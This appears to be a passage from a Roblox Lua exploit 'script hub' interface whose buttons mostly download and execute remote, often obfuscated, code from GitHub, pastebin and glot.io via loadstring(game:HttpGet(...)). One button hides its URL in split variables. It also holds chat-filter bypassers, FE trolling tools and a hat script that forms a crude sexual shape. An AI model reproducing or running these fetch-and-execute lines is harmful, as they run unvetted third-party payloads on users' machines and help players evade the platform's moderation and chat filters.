end) Set_Text_Button.MouseButton1Down:Connect(function() text.Text = "~»"..Tpos_Box_2.Text.."«~" end) Toggle_Chat_Button.MouseButton1Down:Connect(function() if ischatting == false then ischatting = true Chat_Toggle_Label.Text = "~»True«~" spawn(function() game.Players.LocalPlayer.Chatted:connect(function(msg) for i = 0, msg:len(), 1 do text.Text = "~»"..msg:sub(0, i).."«~" end wait(3) text.Text = "~»Fell Apart AF«~" end) end) else ischatting = false Chat_Toggle_Label.Text = "~»False«~" end end) end) Section:NewButton("R15 Animation Gui (only r15)", "r15 onlyn", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/CITY512/scripts/main/freeanims.lua"))() end) Section:NewButton("Hug Gui (if u not r6 wont work)", "R6", function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Hug-Gui-R6-17818"))() end) Section:NewButton("R6 Animations", "R6", function() loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Fe-Silly-animation-V4-16636"))() end) Section:NewButton("Box", "box", function() --[[ WARNING: R6 ONLY Minimum of 4 Hats. Any hats work, but I recommend hats that are sized 1,1,1 for a better experience. It does not offset based on hat size rather a 1 stud offset per hat. Have Fun! Comment if you have questions, need help, or got problems. ]]-- local function align(i,v) local att0 = Instance.new("Attachment", i) att0.Position = Vector3.new(0,0,0) local att1 = Instance.new("Attachment", v) att1.Position = Vector3.new(0,5,0) att1.Rotation = Vector3.new(0,0,0) local AP = Instance.new("AlignPosition", i) AP.Attachment0 = att0 AP.Attachment1 = att1 AP.RigidityEnabled = false AP.ReactionForceEnabled = false AP.ApplyAtCenterOfMass = true AP.MaxForce = 9999999 AP.MaxVelocity = math.huge AP.Responsiveness = 100000 local AO = Instance.new("AlignOrientation", i) AO.Attachment0 = att0 AO.Attachment1 = att1 AO.ReactionTorqueEnabled = true AO.PrimaryAxisOnly = false AO.MaxTorque = 9999999 AO.MaxAngularVelocity = math.huge AO.Responsiveness = 100000 return att1 end local Hats = {} local HatsPosition = {} function FindPlayer(Name) for _,player in pairs(game:GetService("Players"):GetPlayers()) do local PlayerName = string.lower(player.Name) Name = string.lower(Name) if string.find(PlayerName, Name) then return player end end end local Dick = false; local Connections = {} local Character = game.Players.LocalPlayer.Character for index,value in pairs(game.Players.LocalPlayer.Character:GetChildren()) do if value:IsA("Accessory") then value.Handle.Massless = true value.Handle.AccessoryWeld:Destroy() pcall(function() value.Handle.SpecialMesh:Destroy() end) pcall(function() value.Handle.Mesh:Destroy() end) table.insert(Hats, value.Handle) local HatAtt = align(value.Handle, Character["Torso"]) table.insert(HatsPosition, HatAtt) end end for i,hat in pairs(Hats) do if Dick then if i == 1 then HatsPosition[i].Position = (CFrame.new(-0.55,-1.35,-1)).Position else if i == 2 then HatsPosition[i].Position = (CFrame.new(0.55,-1.35,-1)).Position else HatsPosition[i].Position = (CFrame.new(0,-1,(i - 2) * -1)).Position end end else HatsPosition[i].Position = Vector3.new(0,0,0) end end local Key = game:GetService("UserInputService").InputBegan:Connect(function(input, gameProcessedEvent) if not gameProcessedEvent then if input.KeyCode == Enum.KeyCode.Q then -- Key bind to retract and pull out Dick = not Dick if not Dick then for i,hat in pairs(Hats) do HatsPosition[i].Position = Vector3.new(0,0,0) end else if Dick then for i,hat in pairs(Hats) do if Dick then if i == 1 then HatsPosition[i].Position = (CFrame.new(-0.55,-1.35,-1)).Position else if i == 2 then HatsPosition[i].Position = (CFrame.new(0.55,-1.35,-1)).Position else HatsPosition[i].Position = (CFrame.new(0,-1,(i - 2) * -1)).Position end end end end end end end end end) table.insert(Connections, Key) local ActivateNetless = true --[[Netless]]-- settings().Physics.PhysicsEnvironmentalThrottle = Enum.EnviromentalPhysicsThrottle.Disabled settings().Physics.AllowSleep = false game.Players.LocalPlayer.ReplicationFocus = workspace for _,part in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do if part:IsA("BasePart") and part.Name ~="HumanoidRootPart" then Netless = game:GetService("RunService").Heartbeat:Connect(function() if ActivateNetless then part.Velocity = Vector3.new(-29.999,0,0) part.RotVelocity = Vector3.new(0,0,0) end end) table.insert(Connections, Netless) end end Character.Humanoid.Died:Connect(function() for index,connect in pairs(Connections) do connect:Disconnect() end end) game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Notification"; Text = "Script by Atomic Scripter"; Icon = "rbxthumb://type=Asset&id=7317248129&w=150&h=150"}) Duration = 5; end) Section:NewButton("Glios", "BECOME GLIOS", function() loadstring(game:HttpGet(('https://glot.io/snippets/gua2ntmbdm/raw/main.lua'),true))() end) Section:NewLabel("Genesis FE") Section:NewButton("Ak47", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/AK-47"))() end) Section:NewButton("Ban Hammer", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Ban%20Hammer"))() end) Section:NewButton("Banisher", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Banisher"))() end) Section:NewButton("DearSister", "Hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Dearsister"))() end) Section:NewButton("Gale Fighter", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Gale%20Fighter"))() end) Section:NewButton("Goner", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Goner"))() end) Section:NewButton("God Cop Bad Cop", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Good%20Cop%20Bad%20Cop"))() end) Section:NewButton("Karambit", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Karambit"))() end) Section:NewButton("Krystal Dance", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Krystal%20Dance"))() end) Section:NewButton("Lightning Cannon", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Lightning%20Cannon"))() end) Section:NewButton("Linked Sword", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Linked%20Sword"))() end) Section:NewButton("Minigun", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Minigun"))() end) Section:NewButton("Motorcycle", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Motorcycle"))() end) Section:NewButton("Neko", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Neko"))() end) Section:NewButton("Neptunian V", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Neptunian%20V"))() end) Section:NewButton("Pistol", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Pistol"))() end) Section:NewButton("Puppet Master", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Puppet%20Master"))() end) Section:NewButton("Sadist Genocider", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Sadist%20Genocider"))() end) Section:NewButton("Sniper", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Sniper"))() end) Section:NewButton("Star Glitcher", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Star%20Glitcher"))() end) Section:NewButton("Studio Dummy", "hat", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/GenesisFE/Genesis/main/Obfuscations/Studio%20Dummy"))() end) Section:NewLabel("Extra FE Scripts") Section:NewButton("Simple Chat Bypass", "bypass chat", function() loadstring(game:HttpGet("https://pastebin.com/raw/T4FEyvHH"))() end) Section:NewButton("No Name Chat Bypasser", "bypass", function() loadstring(game:HttpGet('https://pastes.io/raw/lstrrfipqq'))(); end) Section:NewButton("Mental Chat Bypasser", "ButtonInfo", function() loadstring(game:HttpGet('https://rawscripts.net/raw/Universal-Script-Chat-bypasser-check-desc-16930'))() end) Section:NewButton("NeverPatched Bypasee (best)", "op and best", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- no obfuscation file, changed to this loadstring(game:HttpGet("https://raw.githubusercontent.com/AlgariBot/lua/refs/heads/Lua-Script-Executor/LocalNeverPatchedBypass.txt"))() end) Section:NewButton("c00lKid Gui (click F3X Games Tab Then Select Coolkid)", "op dangg", function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-C00LMAN-SCRIPT-HUB-10171"))() end) local Tab = Window:NewTab("Hubs And Guis") local Section = Tab:NewSection("Hubs/Guis") Section:NewButton("Rochips", "op", function() if "you wanna use rochips universal" then local z_x,z_z="gzrux646yj/raw/main.ts","https://glot.io/snippets/" local im,lonely,z_c=task.wait,game,loadstring z_c(lonely:HttpGet(z_z..""..z_x))() return ("This will load in about 2 - 30 seconds" or "according to your device and executor") end end) Section:NewButton("Sky Hub", "sky", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/SkyHub.txt"))() end) Section:NewButton("Ghost Hub", "ghost", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub'))() end) Section:NewButton("Vexhub", "patch", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/V31nc/On-Discord/Created/VexHub"))() end) Section:NewButton("Sans Hub", "cool hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/RScripter/ORION-BLUE-THEME/main/Scripthub/Sans%20hub"))() end) Section:NewButton("Ecax Hub V3", "cool hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/RScripter/-ECAX-/main/ECAX_V3.lua"))() end) Section:NewButton("Scripthub v3", "good", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/scripthubekitten/scripthubv3xeno/refs/heads/main/scripthubv3", true))() end) Section:NewButton("Omega Trolling Hub", "best", function() loadstring(game:HttpGet("https://pastebin.com/raw/xnJU9348"))(); end) Section:NewButton("VX.HUB", "BEST", function() loadstring(game:HttpGet("https://pastebin.com/raw/MvUBt3JY"))();loadstring(game:HttpGet("https://pastebin.com/raw/MvUBt3JY"))(); end) local Tab = Window:NewTab("🔥 Showcasers") local Section = Tab:NewSection("When Somoene Showcase This Script There be yt names") local Tab = Window:NewTab("Credits") local Section = Tab:NewSection("ofc credits to script owners") Section:NewLabel("Credits To micro_script He made the loading screen ") Section:NewLabel("This script maded by vxhub_1") Section:NewLabel("in this fact co owner of this script is belali_aw1d") Section:NewLabel("Tester Of This Script Is rap_gamz ")